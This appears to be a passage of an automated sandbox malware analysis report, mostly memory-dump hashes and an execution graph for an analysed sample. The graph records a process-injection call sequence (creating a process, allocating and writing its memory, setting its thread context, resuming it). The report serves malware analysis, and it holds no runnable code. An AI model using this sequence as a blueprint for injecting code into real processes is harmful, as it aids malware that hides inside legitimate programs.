                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d78a710c4a8eab24abeb22c6d398b1a9ad4629b5055c03677eae69fdb163adfe
                                                                    • Instruction ID: 24b096078997e42d776c22562c4fac8321e1aef6a61691a616ae66202864ba92
                                                                    • Opcode Fuzzy Hash: d78a710c4a8eab24abeb22c6d398b1a9ad4629b5055c03677eae69fdb163adfe
                                                                    • Instruction Fuzzy Hash: 2321EEB5D01259ABCB00DF9AD985ADEFFB8FF09310F10812AE518B3201C378A554CFA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4525461392.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_151d000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                                                                    • Instruction ID: b3e2adcd35565cdf86d236bbfd80bf370acfa433b80b8e060bcb935593dd5b30
                                                                    • Opcode Fuzzy Hash: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                                                                    • Instruction Fuzzy Hash: 89119076504284CFEB12CF54D5C8B59BF71FB84224F24C6A9D8594B656C33AD40ACB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4525461392.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_151d000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                    • Instruction ID: 44019680fcf89174c2ad486cb91182e4478e284e27190ac58322e467b684c040
                                                                    • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                    • Instruction Fuzzy Hash: 1211D075544240CFDB06CF54D5C8B59BF71FB44314F24C6A9D8494F256C3BAE40ACBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ebdb0ac941d15faf06608f11629c70a01a5031f70c51434464c393f5e3d63f39
                                                                    • Instruction ID: fa89f42f34300f0c1f67e71afcd04691f22975fd8279a35acee1d52bceae22c7
                                                                    • Opcode Fuzzy Hash: ebdb0ac941d15faf06608f11629c70a01a5031f70c51434464c393f5e3d63f39
                                                                    • Instruction Fuzzy Hash: 8701F730B001154FDB51EABCE86476E7BE6EB8A714F10882CE10AC7365EA29ED028781
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3eb71488d2c1a9f761427410a644e7d2a83cdd923be75a4817d492d3d14aa83d
                                                                    • Instruction ID: ec3606fed9b49e87e58da3fd57f32aca1c85a19746506c5ca102e928ac97eeb5
                                                                    • Opcode Fuzzy Hash: 3eb71488d2c1a9f761427410a644e7d2a83cdd923be75a4817d492d3d14aa83d
                                                                    • Instruction Fuzzy Hash: 7211A2B5D01259AFCB00DF9AD884ADEFFB8FB49310F50812AE518A7341C379A554CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a836d9997fa098bc8e80727b93d3eb38de543b6c6c37eff2840680ca8f51d3c3
                                                                    • Instruction ID: 6a13bd2b1ce9542875dd3f842a8367dbf6d927fd4e6d0b801e0ec62333b81f2d
                                                                    • Opcode Fuzzy Hash: a836d9997fa098bc8e80727b93d3eb38de543b6c6c37eff2840680ca8f51d3c3
                                                                    • Instruction Fuzzy Hash: 5A01AD31B101114BDB69DABDE818B2BA7EAEBCA611F10C43DE10ECB350DE65DD424381
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a4aa8b6004e3e8f92ac5a7eca469476e4a7a909616833de7f4e319c3176fae80
                                                                    • Instruction ID: 2d06fe00edbe5c3ed466cd104ad35c41a6dfba1507e780d8ad2f5c5e2ec4f26d
                                                                    • Opcode Fuzzy Hash: a4aa8b6004e3e8f92ac5a7eca469476e4a7a909616833de7f4e319c3176fae80
                                                                    • Instruction Fuzzy Hash: 2F01D432F141659BDB44966DDC146AF77FAABC8710F05413ED40AD7284EE65EC0287D2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4127d64c055782a01917ee5662a237e43eecae5c6c94b6bbdafcdca28dfabe28
                                                                    • Instruction ID: 4271f2b19dba14c12420ed6c059b9037e25d3d6f9dc8f64f6ab53074bf3dee8b
                                                                    • Opcode Fuzzy Hash: 4127d64c055782a01917ee5662a237e43eecae5c6c94b6bbdafcdca28dfabe28
                                                                    • Instruction Fuzzy Hash: 5201AF39B100151BDB65D67DE858B2E67EADBCEA60F10883DE10ECB350DE25DE0283D1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3c3e8a9d147483a2205dd60177ee7f309a732f389903fe3f4193c67bec1c8577
                                                                    • Instruction ID: a7fce43d4aae131556045f33a39c15b7a70a4f1df1c25c5536323851ecdeff03
                                                                    • Opcode Fuzzy Hash: 3c3e8a9d147483a2205dd60177ee7f309a732f389903fe3f4193c67bec1c8577
                                                                    • Instruction Fuzzy Hash: 4701D172E102199FDF64DBA8D844B9EBBB8EB85324F10453EE409DB244D639D945C7C1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a958417bcbae2d1467fbcadd2f7f249b908d49a9d33d51f2b4ba8e58a4a94cc9
                                                                    • Instruction ID: ac1b3ad97b8704eae0fff8837416b7523ebd805d1e68a7362d71b6e41ed28d5a
                                                                    • Opcode Fuzzy Hash: a958417bcbae2d1467fbcadd2f7f249b908d49a9d33d51f2b4ba8e58a4a94cc9
                                                                    • Instruction Fuzzy Hash: B101A430B001154FDB51EABDE854B2E77EAEB8A714F10843CE50AC7365EE25ED428781
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 233ef7542c7e91443c4238a6a44d27ac8df35a06e04cd0bcb54169f12dd2ae59
                                                                    • Instruction ID: dc1a50b99a7656f25dbaf476162342919e60ff1b50b485de9d0cb0386b070b8a
                                                                    • Opcode Fuzzy Hash: 233ef7542c7e91443c4238a6a44d27ac8df35a06e04cd0bcb54169f12dd2ae59
                                                                    • Instruction Fuzzy Hash: 67F04632F600558BDB218A3CC884799B7B5DF49334F11477EE5BAE73E0CA20C8028391
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bae531756504ba5d76d4337339266944e47469781dae7bd7f467a5915941cbeb
                                                                    • Instruction ID: 1ce3f801f52d80bef6dc30200227ce97d9c174493fe506e836f31424f712ad41
                                                                    • Opcode Fuzzy Hash: bae531756504ba5d76d4337339266944e47469781dae7bd7f467a5915941cbeb
                                                                    • Instruction Fuzzy Hash: F4F0E532F212389BDB24AA69EC04AEBB77BF784354F004439ED11E7340DA32AD0087C0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1c32bc03f31214810b59657bf660f390b0de53f0525a3d38f16bd6d8520c1ebf
                                                                    • Instruction ID: 18511bb461b957b5e18591b53de9c1b8abfc427bdcec756bcf8dfbd8c19f2797
                                                                    • Opcode Fuzzy Hash: 1c32bc03f31214810b59657bf660f390b0de53f0525a3d38f16bd6d8520c1ebf
                                                                    • Instruction Fuzzy Hash: 2EE0D8B1D292848FDF51CAB0DA5535ABBB49B12204F2048EBC048CB252E136DF06C741
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 604deb8ac8316e1a2549d17bc2bbcb37151591c3c2cc2948e4ad95f0588c405b
                                                                    • Instruction ID: d02d7ae5f84781cdca22d80ca7d57cb0b1f21992275e5f0d63d27fc1d320330e
                                                                    • Opcode Fuzzy Hash: 604deb8ac8316e1a2549d17bc2bbcb37151591c3c2cc2948e4ad95f0588c405b
                                                                    • Instruction Fuzzy Hash: C0E012B1E2424CABDF60DEB5D95575EB7BDD711254F2085AAD408C7201E176EF019B80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-2843079600
                                                                    • Opcode ID: 4f341a93167296644d73d12b799b1a3d95772f27eb26b48418f27a3aa447983a
                                                                    • Instruction ID: 0b554550fe90565bbb5b7428c330afff1582a538523a535599a8fad4fa2d8d3a
                                                                    • Opcode Fuzzy Hash: 4f341a93167296644d73d12b799b1a3d95772f27eb26b48418f27a3aa447983a
                                                                    • Instruction Fuzzy Hash: E8123B30F012198FDB68DF69D994A9DB7F6FF88304F208969D409AB264DB349E41CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-1273862796
                                                                    • Opcode ID: 7c4c649965b74abdd98e74ffe9165c347b7893d4738cd709ac18fd696674f156
                                                                    • Instruction ID: e89d0a28f65588a125b6c24f9d5a29b270065453cc5d3dd303d9ce25d25e4394
                                                                    • Opcode Fuzzy Hash: 7c4c649965b74abdd98e74ffe9165c347b7893d4738cd709ac18fd696674f156
                                                                    • Instruction Fuzzy Hash: 09914030F40209DFDB68DFA9D694BAEBBF6EF84700F108529D8019B294DB799D45CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-981061697
                                                                    • Opcode ID: bcd441ffa5f60f0b7451ab6f6ad3a0c4e5537ca236cb0a4036591b6b68e0aa32
                                                                    • Instruction ID: 64e942626e8beb2adc9c1892d978537335914d23f577aeeb4d417d9cc0443ebb
                                                                    • Opcode Fuzzy Hash: bcd441ffa5f60f0b7451ab6f6ad3a0c4e5537ca236cb0a4036591b6b68e0aa32
                                                                    • Instruction Fuzzy Hash: 6AF17D30B01209CFDB58DFA8D594A6EBBB6FF84304F208568D8059B3A4CB35ED42CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-3723351465
                                                                    • Opcode ID: 1761e85f4e4de71fc016c99b94916aa5470f13fccc451c7ea79bcb3c80fe9c6a
                                                                    • Instruction ID: 3729f4994fccbdf89b0fa0e5ac9481bc71c8b2cfd3dbb0635550392ff023a8d2
                                                                    • Opcode Fuzzy Hash: 1761e85f4e4de71fc016c99b94916aa5470f13fccc451c7ea79bcb3c80fe9c6a
                                                                    • Instruction Fuzzy Hash: 00719130F102098FDB68DFA9DA90A6DB7F6FF84304F108569D405EB254DB759D46CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q$$]q
                                                                    • API String ID: 0-858218434
                                                                    • Opcode ID: 08e3a2c3e8724bef7e02b7b84f7b2a1ab6a7eb789313d19ee68b6a81643140c1
                                                                    • Instruction ID: 13d789c920e100fef6c1bbf790ee3bfac1755fc639434389b7915c8d05ab47ba
                                                                    • Opcode Fuzzy Hash: 08e3a2c3e8724bef7e02b7b84f7b2a1ab6a7eb789313d19ee68b6a81643140c1
                                                                    • Instruction Fuzzy Hash: BAB12834B122098FDB54DFA9D5946AEB7B6FF84300F248829D406EB395DB75DD82CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LR]q$LR]q$$]q$$]q
                                                                    • API String ID: 0-3527005858
                                                                    • Opcode ID: 6560b6b7d7d3ad871b084fd3b3138395ec96318ae75e90b5b44c04099665dc4d
                                                                    • Instruction ID: e20780d0ad1fb62c8827687f1ff72d4b1dd70667081c24b0ce4fc7bee36afc59
                                                                    • Opcode Fuzzy Hash: 6560b6b7d7d3ad871b084fd3b3138395ec96318ae75e90b5b44c04099665dc4d
                                                                    • Instruction Fuzzy Hash: AE51B130B012069FDB59DF69D954A6AB7F6FF84300F10856DD4069B3A5DB34EC41CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage: 15.1%
                                                                    Dynamic/Decrypted Code Coverage: 100%
                                                                    Signature Coverage: 0%
                                                                    Total number of Nodes: 174
                                                                    Total number of Limit Nodes: 6
                                                                    execution_graph 18375 663b580 18376 663b740 18375->18376 18379 663b5a6 18375->18379 18377 663b70b 18377->18377 18379->18377 18380 6639088 18379->18380 18381 663b800 PostMessageW 18380->18381 18382 663b86c 18381->18382 18382->18379 18182 6637a27 18184 6637a81 18182->18184 18183 6637c6c 18184->18183 18188 663a306 18184->18188 18208 663a298 18184->18208 18227 663a2a8 18184->18227 18189 663a294 18188->18189 18190 663a309 18188->18190 18191 663a2e6 18189->18191 18246 663ad83 18189->18246 18251 663abbe 18189->18251 18256 663aa90 18189->18256 18263 663aad1 18189->18263 18267 663a7d2 18189->18267 18271 663a7f3 18189->18271 18278 663aeec 18189->18278 18283 663b16d 18189->18283 18289 663a5c8 18189->18289 18295 663aaab 18189->18295 18300 663a88b 18189->18300 18305 663ad06 18189->18305 18309 663ae87 18189->18309 18313 663afe0 18189->18313 18318 663a920 18189->18318 18326 663a9c1 18189->18326 18190->18183 18191->18183 18209 663a2a4 18208->18209 18210 663ad83 2 API calls 18209->18210 18211 663a9c1 2 API calls 18209->18211 18212 663a920 4 API calls 18209->18212 18213 663afe0 2 API calls 18209->18213 18214 663ae87 2 API calls 18209->18214 18215 663ad06 2 API calls 18209->18215 18216 663a88b 3 API calls 18209->18216 18217 663aaab 2 API calls 18209->18217 18218 663a5c8 2 API calls 18209->18218 18219 663b16d 2 API calls 18209->18219 18220 663a2e6 18209->18220 18221 663aeec 2 API calls 18209->18221 18222 663a7f3 4 API calls 18209->18222 18223 663a7d2 2 API calls 18209->18223 18224 663aad1 2 API calls 18209->18224 18225 663aa90 3 API calls 18209->18225 18226 663abbe 2 API calls 18209->18226 18210->18220 18211->18220 18212->18220 18213->18220 18214->18220 18215->18220 18216->18220 18217->18220 18218->18220 18219->18220 18220->18183 18221->18220 18222->18220 18223->18220 18224->18220 18225->18220 18226->18220 18228 663a2c2 18227->18228 18229 663ad83 2 API calls 18228->18229 18230 663a9c1 2 API calls 18228->18230 18231 663a920 4 API calls 18228->18231 18232 663afe0 2 API calls 18228->18232 18233 663ae87 2 API calls 18228->18233 18234 663ad06 2 API calls 18228->18234 18235 663a88b 3 API calls 18228->18235 18236 663aaab 2 API calls 18228->18236 18237 663a5c8 2 API calls 18228->18237 18238 663b16d 2 API calls 18228->18238 18239 663a2e6 18228->18239 18240 663aeec 2 API calls 18228->18240 18241 663a7f3 4 API calls 18228->18241 18242 663a7d2 2 API calls 18228->18242 18243 663aad1 2 API calls 18228->18243 18244 663aa90 3 API calls 18228->18244 18245 663abbe 2 API calls 18228->18245 18229->18239 18230->18239 18231->18239 18232->18239 18233->18239 18234->18239 18235->18239 18236->18239 18237->18239 18238->18239 18239->18183 18240->18239 18241->18239 18242->18239 18243->18239 18244->18239 18245->18239 18247 663ad88 18246->18247 18331 6637360 18247->18331 18335 6637358 18247->18335 18248 663b01c 18252 663abd9 18251->18252 18339 6637110 18252->18339 18343 6637118 18252->18343 18253 663acb0 18253->18191 18257 663aaa5 18256->18257 18258 663a9c0 18256->18258 18347 66371c8 18257->18347 18261 6637110 ResumeThread 18258->18261 18262 6637118 ResumeThread 18258->18262 18259 663acb0 18259->18191 18259->18259 18261->18259 18262->18259 18265 6637360 WriteProcessMemory 18263->18265 18266 6637358 WriteProcessMemory 18263->18266 18264 663aaf5 18265->18264 18266->18264 18268 663a7db 18267->18268 18351 6637450 18268->18351 18355 663744c 18268->18355 18359 66372a0 18271->18359 18363 6637298 18271->18363 18272 663a811 18276 6637360 WriteProcessMemory 18272->18276 18277 6637358 WriteProcessMemory 18272->18277 18273 663b01c 18276->18273 18277->18273 18279 663aef2 18278->18279 18281 6637360 WriteProcessMemory 18279->18281 18282 6637358 WriteProcessMemory 18279->18282 18280 663b01c 18281->18280 18282->18280 18285 663a6c5 18283->18285 18284 663b20a 18284->18191 18285->18284 18367 66375e8 18285->18367 18371 66375e0 18285->18371 18291 663a5cc 18289->18291 18290 663b20a 18290->18191 18291->18290 18293 66375e0 CreateProcessA 18291->18293 18294 66375e8 CreateProcessA 18291->18294 18292 663a7b3 18292->18191 18293->18292 18294->18292 18296 663aab8 18295->18296 18298 6637110 ResumeThread 18296->18298 18299 6637118 ResumeThread 18296->18299 18297 663acb0 18297->18191 18297->18297 18298->18297 18299->18297 18302 66371c8 Wow64SetThreadContext 18300->18302 18301 663a7db 18303 6637450 ReadProcessMemory 18301->18303 18304 663744c ReadProcessMemory 18301->18304 18302->18301 18303->18301 18304->18301 18306 663a7db 18305->18306 18307 6637450 ReadProcessMemory 18306->18307 18308 663744c ReadProcessMemory 18306->18308 18307->18306 18308->18306 18310 663a7db 18309->18310 18311 6637450 ReadProcessMemory 18310->18311 18312 663744c ReadProcessMemory 18310->18312 18311->18310 18312->18310 18314 663afe6 18313->18314 18316 6637360 WriteProcessMemory 18314->18316 18317 6637358 WriteProcessMemory 18314->18317 18315 663b01c 18316->18315 18317->18315 18319 663a92d 18318->18319 18324 6637360 WriteProcessMemory 18319->18324 18325 6637358 WriteProcessMemory 18319->18325 18320 663b0fb 18321 663a7db 18321->18320 18322 6637450 ReadProcessMemory 18321->18322 18323 663744c ReadProcessMemory 18321->18323 18322->18321 18323->18321 18324->18321 18325->18321 18327 663a9db 18326->18327 18329 6637110 ResumeThread 18327->18329 18330 6637118 ResumeThread 18327->18330 18328 663acb0 18328->18191 18328->18328 18329->18328 18330->18328 18332 66373a8 WriteProcessMemory 18331->18332 18334 66373ff 18332->18334 18334->18248 18336 66373a8 WriteProcessMemory 18335->18336 18338 66373ff 18336->18338 18338->18248 18340 6637158 ResumeThread 18339->18340 18342 6637189 18340->18342 18342->18253 18344 6637158 ResumeThread 18343->18344 18346 6637189 18344->18346 18346->18253 18348 663720d Wow64SetThreadContext 18347->18348 18350 6637255 18348->18350 18350->18259 18352 663749b ReadProcessMemory 18351->18352 18354 66374df 18352->18354 18354->18268 18356 6637450 ReadProcessMemory 18355->18356 18358 66374df 18356->18358 18358->18268 18360 66372e0 VirtualAllocEx 18359->18360 18362 663731d 18360->18362 18362->18272 18364 66372a0 VirtualAllocEx 18363->18364 18366 663731d 18364->18366 18366->18272 18368 6637671 CreateProcessA 18367->18368 18370 6637833 18368->18370 18370->18370 18372 6637671 18371->18372 18372->18372 18373 66377d6 CreateProcessA 18372->18373 18374 6637833 18373->18374 18374->18374 18383 3124ba8 18384 3124bb1 18383->18384 18385 3124bb7 18384->18385 18387 3124ca0 18384->18387 18388 3124cc5 18387->18388 18392 3124db0 18388->18392 18396 3124da0 18388->18396 18393 3124dd7 18392->18393 18394 3124eb4 18393->18394 18400 31249dc 18393->18400 18398 3124db0 18396->18398 18397 3124eb4 18398->18397 18399 31249dc CreateActCtxA 18398->18399 18399->18397 18401 3125e40 CreateActCtxA 18400->18401 18403 3125f03 18401->18403
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cc2313e38393c3c374da0e4e7f2dee90b7afae7160e7aeb02920eaac091b7726
                                                                    • Instruction ID: 94dadf93759ffbc0df1c692d30d12e231d1313ad66f7cfb3faaa967190631b61
                                                                    • Opcode Fuzzy Hash: cc2313e38393c3c374da0e4e7f2dee90b7afae7160e7aeb02920eaac091b7726
                                                                    • Instruction Fuzzy Hash: 05D09E3894F228CFE780DF55DA949F8B7FDAB1F310F007059944AE3252D7309995EA84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 602 66375e0-663767d 604 66376b6-66376d6 602->604 605 663767f-6637689 602->605 610 66376d8-66376e2 604->610 611 663770f-663773e 604->611 605->604 606 663768b-663768d 605->606 608 66376b0-66376b3 606->608 609 663768f-6637699 606->609 608->604 612 663769b 609->612 613 663769d-66376ac 609->613 610->611 614 66376e4-66376e6 610->614 621 6637740-663774a 611->621 622 6637777-6637831 CreateProcessA 611->622 612->613 613->613 615 66376ae 613->615 616 6637709-663770c 614->616 617 66376e8-66376f2 614->617 615->608 616->611 619 66376f6-6637705 617->619 620 66376f4 617->620 619->619 623 6637707 619->623 620->619 621->622 624 663774c-663774e 621->624 633 6637833-6637839 622->633 634 663783a-66378c0 622->634 623->616 626 6637771-6637774 624->626 627 6637750-663775a 624->627 626->622 628 663775e-663776d 627->628 629 663775c 627->629 628->628 630 663776f 628->630 629->628 630->626 633->634 644 66378c2-66378c6 634->644 645 66378d0-66378d4 634->645 644->645 648 66378c8 644->648 646 66378d6-66378da 645->646 647 66378e4-66378e8 645->647 646->647 649 66378dc 646->649 650 66378ea-66378ee 647->650 651 66378f8-66378fc 647->651 648->645 649->647 650->651 652 66378f0 650->652 653 663790e-6637915 651->653 654 66378fe-6637904 651->654 652->651 655 6637917-6637926 653->655 656 663792c 653->656 654->653 655->656 657 663792d 656->657 657->657
                                                                    APIs
                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0663781E
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID:
                                                                    • API String ID: 963392458-0
                                                                    • Opcode ID: 805e7765865d35fdc904fbffbcf47fdeaa3c32bacf0bff8ad927adea2855e7f6
                                                                    • Instruction ID: 393e2cb73c34fadbad9e96981fa1ddec8dab99ded146391e6df7dcb6abc2d1d4
                                                                    • Opcode Fuzzy Hash: 805e7765865d35fdc904fbffbcf47fdeaa3c32bacf0bff8ad927adea2855e7f6
                                                                    • Instruction Fuzzy Hash: D7916BB1D00229DFDB64DF69C840BEEBBB2FF45310F14856AE818A7240DB749985CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
